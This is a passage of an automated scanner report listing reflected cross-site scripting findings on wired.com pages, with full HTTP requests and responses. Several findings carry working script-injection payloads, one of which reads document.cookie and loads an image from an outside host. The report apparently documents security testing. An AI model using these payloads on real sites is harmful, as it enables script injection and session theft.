Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=556
Expires: Sun, 21 Nov 2010 23:16:11 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1">
...[SNIP]...

1.475. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine">
...[SNIP]...

1.476. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=581
Expires: Sun, 21 Nov 2010 23:16:23 GMT
Date: Sun, 21 Nov 2010 23:06:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine">
...[SNIP]...

1.477. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=546
Expires: Sun, 21 Nov 2010 23:16:05 GMT
Date: Sun, 21 Nov 2010 23:06:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine2a844"><a>403dadf803e">
...[SNIP]...

1.478. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia">
...[SNIP]...

1.479. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:09 GMT
Date: Sun, 21 Nov 2010 23:07:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia">
...[SNIP]...

1.480. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:23 GMT
Date: Sun, 21 Nov 2010 23:07:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab">
...[SNIP]...

1.481. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.482. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:17 GMT
Date: Sun, 21 Nov 2010 21:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia">
...[SNIP]...

1.483. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:35 GMT
Date: Sun, 21 Nov 2010 21:59:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia">
...[SNIP]...

1.484. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:48 GMT
Date: Sun, 21 Nov 2010 21:59:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c">
...[SNIP]...

1.485. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia">
...[SNIP]...

1.486. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:18 GMT
Date: Sun, 21 Nov 2010 23:07:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia">
...[SNIP]...

1.487. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86">
...[SNIP]...

1.488. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/>"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=114661<script>alert(1)</script>f716d04df3f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=114661<script>alert(1)</script>f716d04df3f', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.489. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src=2ca4a"><script>alert(1)</script>649eec63546 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40635


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=2ca4a"><script>alert(1)</script>649eec63546', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.490. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
